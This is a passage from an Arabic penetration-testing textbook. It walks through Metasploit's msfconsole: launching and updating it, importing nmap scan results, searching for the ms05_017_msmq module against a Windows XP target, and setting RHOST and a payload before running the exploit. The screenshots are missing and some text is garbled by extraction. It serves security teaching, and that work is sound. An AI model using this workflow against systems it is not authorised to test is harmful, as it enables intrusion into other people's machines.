‫أﺳﮭل طرﯾﻘﺔ ﻟﻠوﺻول إﻟﻰ ‪ msfconsole‬ھو ﻣن ﺧﻼل ﻓﺗﺢ اﻟﺗرﻣﻧﺎل وإدﺧﺎل اﻟﺳطر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪#msfconsole‬‬
‫ﯾوﺟد طرﯾﻘﮫ أﺧرى ﻟﺗﺷﻐﯾل ‪ Metasploit‬ﻓﻲ اﻟﺑﯾﺋﺔ اﻟرﺳوﻣﯾﺔ وذﻟك ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ ‪ msfgui‬ﻓﻲ اﻟﺗرﻣﻧﺎل‪.‬‬
‫ﻛﻣﺎ ﯾﻣﻛن اﻟوﺻول إﻟﻰ ‪ msfconsole‬ﻣن ﺧﻼل ﻗﺎﺋﻣﺔ اﻟﺗطﺑﯾﻘﺎت ﻋﻠﻰ ﺳطﺢ اﻟﻣﻛﺗب‪ .‬ﺑدء ‪ msfconsole‬ﯾﺳﺗﻐرق ﻣﺎ ﺑﯾن ‪ 10‬ﺛﺎﻧﯾﺔ و‪30‬‬
‫ﺛﺎﻧﯾﺔ‪ ،‬ﻟذﻟك ﻻ داﻋﻲ ﻟﻠذﻋر إذا ﻟم ﯾﺣدث ﺷﻲء ﻟﺑﺿﻊ ﻟﺣظﺎت‪ .‬ﻓﻲ ﻧﮭﺎﯾﺔ اﻟﻣطﺎف‪ ،‬ﺳوف ﺗﺑدأ ‪ Metasploit‬ﻣن ﺧﻼل ﺗﻘدﯾم ﻟﻛم ﻣﻊ ﻻﻓﺗﺔ‬
‫ﺗرﺣﯾب وﻋﻼﻣﺔ اﻟﻣﺣث]>‪ .[msf‬وھﻧﺎك اﻟﻌدﯾد ﻣن اﻟﻼﻓﺗﺎت ‪ Metasploit‬اﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﯾﺗم ﻋرﺿﮭﺎ ﻋﺷواﺋﯾﺎ‪ ،‬ﻟذﻟك ﻓﻣن اﻟطﺑﯾﻌﻲ إذا اﻟﺷﺎﺷﺔ‬
‫ﺗﺑدو ﻣﺧﺗﻠﻔﺔ ﻓﻲ ﻛل ﻣره‪ .‬اﻟﺷﻲء اﻟﻣﮭم ھو أن ﺗﺣﺻل ﻋﻠﻰ ﻋﻼﻣﺔ اﻟﻣﺣث]>‪.[msf‬‬
‫اﻟﺷﺎﺷﺔ اﻷوﻟﯾﺔ ﻠﻠ ‪ Metasploit‬ﺗظﮭر ﻛﺎﻻﺗﻰ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪299‬‬

‫ﻣن ﻓﺿﻠك ﻻﺣظ‪ ،‬ﻋﻧد ﺗﺣﻣﯾل ‪ Metasploit‬ﻷول ﻣره‪ ،‬ﻓﺈﻧﮫ ﯾظﮭر ﻟك ﻋدد ‪ ،encoders ،payloads ،Exploits‬و‪ nops‬اﻟﻣﺗﺎﺣﺔ‪ .‬ﻛﻣﺎ‬
‫ﯾﻣﻛن أن ﺗظﮭر ﻟﻛم ﻛم ﯾوﻣﺎ ﻣر ﻣﻧذ آﺧر اﻟﺗﺣدﯾث‪ .‬ﺑﺳﺑب اﻟﻧﻣو اﻟﺳرﯾﻊ ‪ ،Metasploit‬وﻧﺷﺎط اﻟﻣﺟﺗﻣﻊ واﻟﺗﻣوﯾل اﻟﻣﺎدي‪ .‬ﻓﻣن اﻷھﻣﯾﺔ أن‬
‫ﺗﺣﺎﻓظ ﻋﻠﻰ ‪ Metasploit‬ﻣﺣدث اﻟﻰ ﺗﺎرﯾﺦ اﻟﯾوم‪ .‬وﯾﺗم إﻧﺟﺎز ھذا ﺑﺳﮭوﻟﺔ ﻋن طرﯾﻖ إدﺧﺎل اﻷﻣر اﻟﺗﺎﻟﻲ ﻓﻲ اﻟﺗرﻣﻧﺎل‪.‬‬
‫‪#msfupdate‬‬
‫اﻵن ﺑﻌد ان ﺗم ﺗﺣدﯾث ‪ ،Metasploit‬دﻋوﻧﺎ ﻧﺑدأ اﺳﺗﻛﺷﺎف رواﺋﻊ ھذه اﻷداة‪ .‬ﻣن أﺟل اﺳﺗﺧدام ‪ ،Metasploit‬ﯾﺟب ﺗﺣدﯾد اﻟﮭدف‪ ،‬وﯾﺟب‬
‫اﺧﺗﯾﺎر ‪ ،exploit‬و‪ payloads‬اﻟﺗﻲ ﻧﺣﺗﺎﺟﮭﺎ وﯾﻣﻛن اﻟﺣﺻول ﻋﻠﯾﮭﺎ‪ ،‬ﺛم ﯾﺟب ﺗﺷﻐﯾل ‪ .exploit‬ﺳوف ﻧﺳﺗﻌرض اﻟﺗﻔﺎﺻﯾل ﻟﻛل ﺧطوة ﻣن‬
‫ھذه اﻟﺧطوات ﻓﻲ ﻟﺣظﺎت ﻗﻠﯾﻠﺔ‪ ،‬وﻟﻛن ﻗﺑل ذﻟك‪ ،‬دﻋوﻧﺎ ﻧﺳﺗﻌرض أﺳﺎﺳﯾﺎت ﻣﺻطﻠﺢ ‪ .Metasploit‬ﻛﻣﺎ ذﻛر ﻓﻲ وﻗت ﺳﺎﺑﻖ‪ ،‬اﻻﺳﺗﻐﻼل‬
‫)‪ (exploit‬ھو اﻟﺣﺻول ﻋﻠﻰ اﻷﻛواد اﻟﺟﺎھزة واﻟﺗﻲ ﯾﺗم إرﺳﺎﻟﮭﺎ إﻟﻰ ﻧظﺎم ﺑﻌﯾد‪ .‬ھذه اﻷﻛواد ﯾﺳﺑب ﺑﻌض اﻟﺳﻠوك اﻟﻐﯾر طﺑﯾﻌﻲ ﻋﻠﻰ اﻟﻧظﺎم‬
‫اﻟﮭدف اﻟذي ﯾﺳﻣﺢ ﻟﻧﺎ ﻟﺗﻧﻔﯾذ ‪ .payloads‬ﻧذﻛر ﺑﺄن ‪ payloads‬ھو أﯾﺿﺎ ﻛﺗﻠﺔ ﺻﻐﯾرة ﻣن اﻷﻛواد اﻟﺗﻲ ﺗﺳﺗﺧدم ﻷداء ﺑﻌض اﻟﻣﮭﺎم ﻣﺛل ﺗﺛﺑﯾت‬
‫ﺑرﻧﺎﻣﺞ ﺟدﯾد‪ ،‬وإﻧﺷﺎء ﻣﺳﺗﺧدﻣﯾن ﺟدد‪ ،‬أو ﻓﺗﺢ ‪ backdoor‬ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف‪.‬‬
‫ﻧﻘﺎط اﻟﺿﻌف )‪(vulnerabilities‬ھﻲ ﻧﻘﺎط اﻟﺿﻌف اﻟﺗﻲ ﺗﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﺎﺧﺗراق )‪(exploit‬اﻷﻧظﻣﺔ وﺗﻧﻔﯾذ اﻷﻛواد ﻋن ﺑﻌد )‪(payloads‬‬
‫ﻋﻠﻰ اﻟﮭدف‪ Payloads .‬ھﻲ ﺑراﻣﺞ إﺿﺎﻓﯾﺔ أو وظﺎﺋف اﻟﺗﻲ ﻧدﯾرھﺎ ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف ﻣرة واﺣدة ﻓﻲ اﺧﺗراق ﻗد ﻧﻔذ ﺑﻧﺟﺎح‪.‬‬
‫ﻣﻌظم اﻟﻘﺎدﻣﯾن اﻟﺟدد ﯾﺗﯾﮭون ﻓﻲ اﻟﻌدد اﻟﮭﺎﺋل ﻣن ‪ exploit‬و‪payloads‬؛ ﻋﺎدة ﻣﺎ ﯾﺿﯾﻌون ﻓﻲ ﻣﺣﺎوﻟﺔ اﻟﻌﺛور ﻋﻠﻰ ‪ exploit‬اﻟﻣﻧﺎﺳﺑﺔ‪ .‬اﻧﮭم‬
‫ﯾﻘﺿون وﻗﺗﮭم ﻓﻲ رﻣﻲ ﻛل ‪ exploit‬ﺿد اﻟﮭدف ﺑطرﯾﻘﺔ ﻋﻣﯾﺎء ﻋﻠﻰ أﻣل أن ﯾﺣﺻل ﺷﯾﺋﺎ‪ .‬ﻻﺣﻘﺎ ﻓﻲ ھذا اﻟﻔﺻل‪ ،‬ﺳوف ﻧدرس أداة ﺗﻌﻣل ﺑﮭذه‬
‫اﻟطرﯾﻘﺔ وﻟﻛن اﻵن ﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ أن ﻧﻛون أﻛﺛر ﻣن ذﻟك ﺑﻘﻠﯾل‪.‬‬

‫ﺑﻌض اﻷواﻣر اﻟﺷﺎﺋﻌﺔ اﻟﺗﻲ ﺳوف ﻧﺳﺗﺧدﻣﮭﺎ ﻋﻧد اﻟﺗﻌﺎﻣل ﻣﻊ وﺣدة اﻟﺗﺣﻛم ‪ MSFCONSOLE‬ھﻲ ﻛﺎﻻﺗﻰ‪:‬‬

‫]?‪ :[help/‬ھذا اﻷﻣر ﯾﺳﻣﺢ ﻟك ﺑﻌرض ﻣﻠﻔﺎت اﻟﻣﺳﺎﻋدة ﻟﻸواﻣر اﻟﺗﻲ ﺗﺣﺎول ﺗﺷﻐﯾﻠﮭﺎ‪.‬‬
‫]‪ :[use module‬ﯾﺳﻣﺢ ﻟك ھذا اﻷﻣر ﻟﺑدء اﻋداد اﻟوﺣدة )‪ (module‬اﻟذى ﺗﺧﺗﺎرھﺎ‪.‬‬
‫]‪ :[set option_name module‬ﯾﺳﻣﺢ ﻟك ھذا اﻷﻣر ﻟﺗﺣدﯾد اﻟﺧﯾﺎرات اﻟﻣﺧﺗﻠﻔﺔ ﻟوﺣدة )‪ (module‬اﻟﻣﺧﺗﺎرة‪.‬‬
‫]‪ :[exploit‬ھذا اﻻﻣر ﯾؤدى اﻟﻰ ﺗﺷﻐﯾل وﺣدة اﻻﺧﺗراق )‪.(exploit module‬‬
‫]‪ :[run‬ھذا اﻻﻣر ﯾؤدى اﻟﻰ ﺗﺷﻐﯾل اﻟوﺣدات اﻷﺧرى اﻟﻐﯾر ﻣﺧﺻﺻﮫ ﻟﻼﺧﺗراق )‪.(non-exploit module‬‬
‫]‪ :[search module‬ھذا اﻷﻣر ﯾﺳﻣﺢ ﻟك ﺑﺎﻟﺑﺣث ﻋن وﺣدة ﻓردﯾﺔ‪.‬‬
‫]‪ :[exit‬ھذا اﻷﻣر ﯾﺳﻣﺢ ﻟك ﻟﻠﺧروج ﻣن ‪.MSFCONSOLE‬‬
‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ أواﻣر ‪ ،Metasploit‬ﻓﺎن ‪ msfconsole‬ﺳوف ﺗﺳﻣﺢ ﻟك ﺑﺎﺳﺗدﻋﺎء أواﻣر ﻧظﺎم اﻟﺗﺷﻐﯾل اﻷﺳﺎﺳﯾﺔ ﻣﺛل ‪ ping‬أو ‪ .nmap‬ھذا‬
‫ﻣﻔﯾد ﻷﻧﮫ ﯾﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻟﺗﻧﻔﯾذ اﻟﻣﮭﺎم اﻟروﺗﯾﻧﯾﺔ دون أن ﺗﺗرك وﺣدة اﻟﺗﺣﻛم‪ .‬ﻓﻲ أول ﺧطوة ﻧﺧطوھﺎ‪ ،‬وﺳوف ﻧﺳﺗﺧدم ‪ nmap‬ﻟﻔﺣص‬
‫اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ‪ .‬اﻟﻧﺗﺎﺋﺞ ﯾﻣﻛن أن ﯾﺿﺎف ﺗﻠﻘﺎﺋﯾﺎ إﻟﻰ ‪ Metasploit‬ﺑﺎﺳﺗﺧدام ﻣﻠف ‪.XML‬‬

‫ﺳوف ﻧﻘوم اﻻن ﺑﺗﻧﻔﯾذ ﻋﻣﻠﯾﺔ اﺧﺗراق ﺑﺎﺳﺗﺧدام ‪MSFCONSOLE‬‬

‫ﻛﻣﺎ ﺗﺣدﺛﻧﺎ ﺳﺎﺑﻘﺎ ﺑدﻻ ﻣن رﻣﻲ ﻛل ‪ exploit‬ﺿد اﻟﮭدف ﺑطرﯾﻘﺔ ﻋﻣﯾﺎء‪ ،‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻹﯾﺟﺎد وﺳﯾﻠﺔ ﻹﯾﺟﺎد ‪ exploit‬اﻟﺟﺎھزة ﻓﻲ‬
‫‪ Metasploit‬ﻟﻣﻘﺎﺑﻠﺔ ﻧﻘﺎط اﻟﺿﻌف اﻟﻣﻌروﻓﺔ ﻓﻲ اﻟﻧظﺎم اﻟﮭدف‪ .‬ﻣن أﺟل رﺑط ﻧﻘﺎط اﻟﺿﻌف ﻓﻲ اﻟﻧظﺎم اﻟﮭدف ﻣﻊ ‪،Metasploit exploit‬‬
‫ﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻟﻣراﺟﻌﺔ اﻟﻧﺗﺎﺋﺞ اﻟﺗﻲ ﺗوﺻﻠﻧﺎ إﻟﯾﮭﺎ ﻣن اﻟﺧطوة اﻟﺛﺎﻧﯾﺔ )‪ (Scanning‬ﺳﻧﺑدأ ھذه اﻟﻌﻣﻠﯾﺔ ﻣن ﺧﻼل اﻟﺗرﻛﯾز ﻋﻠﻰ ﺗﻘرﯾر ‪Nessus‬‬
‫أو‪ OpenVAS‬او " >‪ ."nmap –script vuln <target‬ﺣﯾث ﻧذﻛر ﺑﺄن ھؤﻻء ﯾﺳﺗﺧدﻣوا ﻟﻔﺣص ﻧﻘﺎط اﻟﺿﻌف وﯾوﻓر ﻟﻧﺎ ﻗﺎﺋﻣﺔ ﻣن‬
‫ﻧﻘﺎط اﻟﺿﻌف اﻟﻣﻌروﻓﺔ أو اﻟﺑﺎﺗش اﻟﻣﻔﻘودة‪ .‬ﻋﻧد اﺳﺗﻌراض إﺧراج ‪ Nessus‬او ‪ ،OpenVAS‬ﯾﺟب ﻋﻠﯾك اﻟﺗﺄﻛد ﻣن اﻟﻣﻼﺣظﺎت وﻟﻛن‬
‫اﻟﻧﺗﺎﺋﺞ اﻟﺗﻲ وﺻﻔت ﺑﺄﻧﮭﺎ "ﻋﺎﻟﯾﺔ" أو "ﺑﺎﻟﻎ اﻷھﻣﯾﺔ" ﯾﺟب ان ﯾﻛون ﻟﮭﺎ اھﺗﻣﺎم ﺧﺎص‪ .‬اﻟﮭدف ﻣن ھذه اﻟﻣرﺣﻠﺔ ھو ﺗﺧﺻﯾص ‪ exploit‬ﻟﻧﻘﺎط‬
‫اﻟﺿﻌف اﻟﻣﺣددة ﻓﻲ اﻟﻧظﺎم اﻟﮭدف‪.‬‬

‫ﻧﻔﺗرض أن ﻟدﯾك ھدﻓﺎ ﺟدﯾدا ﻣﻊ ﻋﻧوان ‪ .[192.168.1.104] IP‬ﻣﻊ ﺗﺷﻐﯾل ‪ Nmap‬ﯾﺧﺑرك ان ھذا اﻟﮭدف اﻟﺟدﯾد ھو آﻟﺔ ذات ﻧظﺎم ﺗﺷﻐﯾل‬
‫وﯾﻧدوز ‪ XP Service pack 3‬وﺟدار ﺣﻣﺎﯾﺔ ﻏﯾر ﻣﻔﻌل‪ .‬ﻧﺳﺗﻣر ﻓﻲ اﻟﺧطوة ‪ ،2‬ﺣﯾث ﯾﻣﻛن ﺗﺷﻐﯾل ‪ Nessus‬او ‪ OpenVAS‬او ‪nmap‬‬
‫ﻋﻠﻰ اﻟﮭدف وذﻟك ﻹﻋطﺎﺋك ﺗﻘرﯾر ﻋن ﻧﻘﺎط اﻟﺿﻌف‪.‬‬

‫‪ -1‬ﺳوف ﻧﻘوم ﺑﺗﺷﻐﯾل ﺑرﻧﺎﻣﺞ ‪ Nmap‬ﻋﻠﻰ ھذا اﻟﮭدف ﺑﺎﺳﺗﺧدام ‪ msfconsole‬ﻹﻋطﺎء ﺗﻘرﯾر ﻋن اﻟﺧدﻣﺎت ﻋن اﻟﮭدف ﻛﺎﻻﺗﻰ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪300‬‬

‫‪ -2‬ھﻧﺎ ﻗﻣﻧﺎ ﺑﻔﺣص اﻟﻧظﺎم اﻟﮭدف ﺛم ﺣﻔظﻧﺎ ﻧﺎﺗﺞ اﻟﻔﺣص ﻓﻲ ﻣﻠف ‪ xml‬ﺑﺎﺳم ‪ my.xml‬وذﻟك ﺑﺎﺳﺗﺧدام اﻟﺗﻌﺑﯾر ‪.–oX‬‬
‫‪ -3‬ﺳﻧﻘوم ﺑﺎﺳﺗﯾراد ھذه اﻟﻧﺗﺎﺋﺞ ﻣن ‪ nmap‬اﻟﻰ ‪ Metasploit‬ﺑﺎﺳﺗﺧدام ﻣﻠف ‪ xml‬اﻟذي أﻧﺷﺄﻧﺎه‪ .‬وﻧﺣن ﻧﻔﻌل ذﻟك ﻣن ﺧﻼل إﺻدار‬
‫اﻷواﻣر اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -4‬ﻧﻼﺣظ وﺟود ﻣﺷﻛﻠﮫ وھﻲ ان ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت ﻏﯾر ﻣﺗﺻﻠﺔ وﻹﺛﺑﺎت ذﻟك ﻧﻛﺗب اﻻﻣر اﻟﺗﺎﻟﻲ‪:‬‬

‫‪ -5‬ﻟﺣل ھذه اﻟﻣﺷﻛﻠﺔ ﻧﺗﺑﻊ اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -6‬ﻟﻠﺗﺄﻛد ﻣن ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت ﺳﻠﯾﻣﮫ ﻧدﺧل ﻋﻠﻰ ‪ msfconsole‬ﺛم ﻧﻛﺗب ‪ db_status‬ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻣﻠﺣوظﮫ‪ :‬إذا ﻛﻧت ﺗرﻏب ﻓﻲ ﺑدء ﺧدﻣﺗﻲ ‪ postgresql‬و‪ Metasploit‬ﺑطرﯾﻘﮫ اﻟﯾﮫ ﻋﻧد إﻋﺎدة اﻟﺗﺷﻐﯾل ﻓﺳوف ﺗﺣﺗﺎج إﻟﻰ اﺳﺗﺧدام‬
‫‪.update-rc.d‬‬
‫‪#update-rc.d©postgresql©enable‬‬
‫‪#update-rc.d©metasploit©enable‬‬

‫‪ -7‬ﻧﻘوم اﻻن ﺑﺈدراج ﻧﺎﺗﺞ اﻻﻣر ‪ nmap‬اﻟﻰ ‪ metasploit‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -8‬ﻧﻘوم ﺑﻔﺣص ﺳرﯾﻊ ﻟﻸﻣر ‪ hosts‬واﻟذي ﯾدل ﻋﻠﻰ أن ﻋﻣﻠﯾﺔ اﻻﺳﺗﯾراد ﻟدﯾﻧﺎ ﻧﺎﺟﺣﺔ‪ .‬اﻻن و‪ Metasploit‬ﻟدﯾﮫ ﺑﯾﺎﻧﺎت ‪.nmap‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪301‬‬

‫‪ -9‬ﻟرؤﯾﺔ اﻟﺧدﻣﺎت اﻟﻣﺗﺎﺣﺔ ﻓﻲ اﻟﻧظﺎم اﻟﮭدف ﻓﻲ ‪ metasploit‬ﯾﻣﻛﻧك ذﻟك ﺑﺎﺳﺗﺧدام اﻻﻣر ‪ services‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -10‬ﯾﻣﻛﻧك ﻋﻣل اﻟﺧطوﺗﯾن اﻟﺳﺎﺑﻘﺗﯾن وھو اﻟﻔﺣص ﺑﺑرﻧﺎﻣﺞ ‪ nmap‬وإدﺧﺎل ﻧﺎﺗﺞ اﻻﻣر اﻟﻰ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ metasploit‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -11‬ﺛم ﯾﻣﻛﻧك اﻟﺗﺣﻘﻖ ﻣن أن ‪ Metasploit‬ﻟدﯾﮫ اﻟﻣﻌﻠوﻣﺎت ذات اﻟﺻﻠﺔ ﺑﻘﺎﻋدة اﻟﺑﯾﺎﻧﺎت اﻟﺧﺎﺻﺔ ﺑﮫ ﺑﺎﺳﺗﺧدام اﻻﻣرﯾن ‪hosts‬‬
‫و‪ services‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -12‬ﯾﻛﺷف اﻷﻣر ‪ services‬ﻣﺛﻼ ان اﻟﻧظﺎم اﻟﮭدف ﯾﺳﺗﺧدم اﻟﺧدﻣﺔ ‪ .msrpc‬دﻋوﻧﺎ ﻧرى ﻣﺎ إذا ﻛﻧﺎ ﻧﺳﺗطﯾﻊ اﻟﺑﺣث ﻋن ‪ exploit‬ﺗﺧص‬
‫ھذا واﻻﺳﺗﻔﺎدة ﻣن ذﻟك‪ .‬ﻣن اﻟﻣﮭم أن ﻧﻼﺣظ أﻧﮫ ﻋﻧد ﻣﮭﺎﺟﻣﺔ ﺧﺎدم اﻟوﯾب اﻟﺣﻘﯾﻘﻲ ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬ﻓﻧﺣن ﻻ ﻧﺣﺗﺎج ﺑﺎﻟﺿرورة إﻟﻰ‬
‫ﻣﺣﺎوﻟﺔ اﺳﺗﻐﻼل ﻧﻘطﺔ ﺿﻌف ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ .‬ﺣﯾث ان اﻟﻣﮭﺎﺟم اﻟﺣﻘﯾﻘﻲ ﯾﺳﺗﻔﯾد ﻣن ﺟﻣﯾﻊ اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﺧﺎدم اﻟوﯾب‬
‫ﻟﻠوﺻول إﻟﻰ اﻟﻣﻌﻠوﻣﺎت‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪302‬‬

‫‪ -13‬ﻧﺳﺗﺧدم اﻻﻣر ‪ search‬ﻟﻧرى اﻟﻌدﯾد ﻣن ‪ exploit‬اﻟﻣﺗﺎﺣﺔ اﻟﺧﺎﺻﺔ ب ‪ .msrpc‬ﻟﻧﺟد ان ﻟدﯾﮭم أﯾﺿﺎ ﺗﺻﻧﯾف‪ .‬ﯾﻔﺿل اﺳﺗﺧدام‬
‫ﺻﺎﺣب اﻟﺗﺻﻧﯾف ‪.excellent‬ﻟﻠﻣزﯾد ﻣن اﻟﻣﻌرف ﺣول ھذه اﻟوﺣدات ﻣن ﺧﻼل ﻣوﻗﻊ اﻟوﯾب اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://www.metasploit.com/modules/exploit/‬‬

‫‪ -14‬ﺳوف ﻧﺳﺗﺧدم ‪ ms05_017_msmq‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -15‬ﺑﻣﺟرد ﺗﺣدﯾد ‪ ،exploit‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ اﻟﻰ ان ﻧرى ﻣﺎ ھﻲ اﻟﻣﻌﻠوﻣﺎت اﻟﻣطﻠوﺑﺔ ﻗﺑل أن ﻧﺗﻣﻛن ﻣن ﺗﻧﻔﯾذ اﺧﺗﯾﺎرﻧﺎ‪ .‬وﻧﺣن ﻧﻔﻌل ذﻟك‬
‫ﻋن طرﯾﻖ ﺗﺣدﯾد اﻟﺧﯾﺎرات اﻟﻣطﻠوﺑﺔ اﻟﻣدرﺟﺔ ﻓﻲ اﻹﺧراج واﺧﺗﯾﺎر ‪ payloads‬اﻟﺗﻲ ﻧرﯾد ﺗﺳﻠﯾﻣﮭﺎ‪ .‬ﻧﺻدر اﻷﻣر ‪show options‬‬
‫ﻟﻌرض اﻟﺧﯾﺎرات اﻟﻣطﻠوﺑﺔ‪:‬‬

‫‪ -16‬ﯾﻣﻛﻧﻧﺎ أن ﻧرى ﻣن ھذا اﻟﻣﺛﺎل أﻧﻧﺎ ﺑﺣﺎﺟﺔ إﻟﻰ إدﺧﺎل ﺑﯾﺎﻧﺎت ‪ RHOST. RHOST‬ھو ﻋﻧوان ‪ IP‬ﻟﻠﻣﺿﯾف اﻟﺑﻌﯾد اﻟﮭدف‪ .‬وﻧﺣن‬
‫ﺑﺣﺎﺟﺔ أﯾﺿﺎ ﻟﺗﺣدﯾد اﻟﺣﻣوﻟﺔ ‪ payloads‬ووﺿﻊ ﺧﯾﺎرات ‪ .payloads‬رﺑﻣﺎ ﯾﻛون ھﻧﺎك اﻟﻌدﯾد ﻣن ‪ payloads‬ﻣﺗﻌددة ﻟﻼﺧﺗﯾﺎر‬
‫ﻣن ﺑﯾﻧﮭﺎ‪ .‬ﻟﻣﻌرﻓﺔ ‪ payloads‬اﻟﻣﺗﺎﺣﺔ‪ ،‬إﺻدار اﻷﻣر ‪.show payloads‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪303‬‬

‫‪ -17‬ﺑﻣﺟرد رؤﯾﺔ ‪ Payloads‬اﻟﺗﻲ ﺗرﯾدھﺎ ﻓﺳوف ﺗﺣﺗﺎج اﻟﻰ إدراج ‪ payloads‬ﻻﺳﺗﺧداﻣﮫ ﻋن طرﯾﻖ اﺻدار اﻻﻣر ‪.set PAYLOAD‬‬

‫‪ -18‬ﺑﻌد اﻻﻧﺗﮭﺎء ﻣن وﺿﻊ اﻻﻋدادات اﻟﻰ ﺗرﯾدھﺎ ﻧﻘوم ﺑﺗﺷﻐﯾل ‪.exploit‬‬

‫ﻓﯾﻣﺎ ﯾﻠﻲ ﻣﻠﺧص ﻟﻠﺧطوات اﻟﺳﺎﺑﻘﺔ‪:‬‬

‫‪ .1‬ﻧﺑدأ ‪ metasploit‬ﻋن طرﯾﻖ ﻓﺗﺢ اﻟﺗرﻣﻧﺎل ﺛم ﻛﺗﺎﺑﺔ اﻻﻣر اﻟﺗﺎﻟﻲ‪:‬‬


‫‪#msfconsole‬‬
‫‪ .2‬ﻧﺳﺗﺧدم اﻻﻣر ‪ search‬ﻓﻲ ‪ metasploit‬وذﻟك ﻟﻠﺑﺣث ﻋن ‪ exploit‬اﻟﻣﻧﺎﺳب اﻟﺗﻲ ﺗﻘﺎﺑل ﻧﻘطﺔ اﻟﺿﻌﻔﺔ اﻟﻣوﺟودة ﻓﻲ ﺗﻘﺎرﯾر اﻟﻔﺣص‪.‬‬
‫)‪msf> search missing_patch_number (or CVE‬‬
‫‪ .3‬ﻧﺳﺗﺧدم اﻻﻣر ‪ use‬ﻻﺧﺗﯾﺎر ‪ exploit‬اﻟذي ﺗرﯾده‪.‬‬
‫‪msf> use exploit_name_and_path‬‬
‫‪ .4‬ﻧﺳﺗﺧدم اﻻﻣر ‪ show payloads‬ﻟﻌرض ‪ payloads‬اﻟﻣﺗﺎﺣﺔ‪.‬‬
‫‪msf> show payloads‬‬
‫‪ .5‬ﻧﺳﺗﺧدم اﻻﻣر ‪ set‬ﻻﺧﺗﯾﺎر ‪.payloads‬‬
‫‪msf> set payload path_to_payload‬‬
‫‪ .6‬ﻧﺳﺗﺧدم اﻻﻣر ‪ show options‬ﻟرؤﯾﺔ ﺟﻣﯾﻊ اﻟﺧﯾﺎرات اﻟﺗﻲ ﺗﺣﺗﺎج اﻟﻰ وﺿﻌﮭﺎ ﻗﺑل اﺧﺗراق اﻟﮭدف‪.‬‬
‫‪msf> show options‬‬
‫‪ .7‬ﻧﺳﺗﺧدم اﻻﻣر ‪ set‬ﻣﻊ أي ﺧﯾﺎر وذﻟك ﻹﻋداد ﻗﯾﻣﮫ‪.‬‬
‫‪msf> set option_name desired_option_input‬‬
‫‪ .8‬ﻧﺳﺗﺧدم اﻻﻣر ‪ exploit‬ﻟﺗﺷﻐﯾل ‪ exploit‬ﺿد اﻟﮭدف‪.‬‬
‫اﻵن ﻟدﯾك ﻓﮭم أﺳﺎﺳﻲ ﻟﻛﯾﻔﯾﺔ اﺳﺗﺧدام ‪ ،Metasploit‬ﻣن اﻟﻣﮭم اﺳﺗﻌراض ﻋدد ﻗﻠﯾل ﻣن أﻛﺛر ‪ payloads‬اﻷﺳﺎﺳﯾﺔ اﻟﻣﺗوﻓرة ﻟدﯾك‪ .‬ﻋﻠﻰ‬
‫اﻟرﻏم ﻣن أن ﺣﻘن ‪ VNC‬ھو ﺑﺎرد ﺑﺷﻛل ﻻ ﯾﺻدق وﻛﺑﯾرة ﻹﻗﻧﺎع اﻷﺻدﻗﺎء واﻷﻗﺎرب‪ ،‬وزﻣﻼء اﻟﻌﻣل‪ ،‬وﻧﺎدرا ﻣﺎ ﯾﺳﺗﺧدم ﻓﻲ اﺧﺗﺑﺎر‬
‫اﻻﺧﺗراق اﻟﻔﻌﻠﻲ‪ .‬ﻓﻲ ﻣﻌظم اﻟﺗﺟﺎرب اﻻﺧﺗراق‪ ،‬اﻟﻘراﺻﻧﺔ ﺗﻔﺿل اﺳﺗﺧدام ﺑﯾﺋﺔ ﺳطر اﻷواﻣر ﺑﺳﯾطﺔ ﻣﻣﺎ ﯾﺗﯾﺢ اﻟوﺻول واﻟﺗﺣﻛم ﻋن ﺑﻌد ﻓﻲ‬
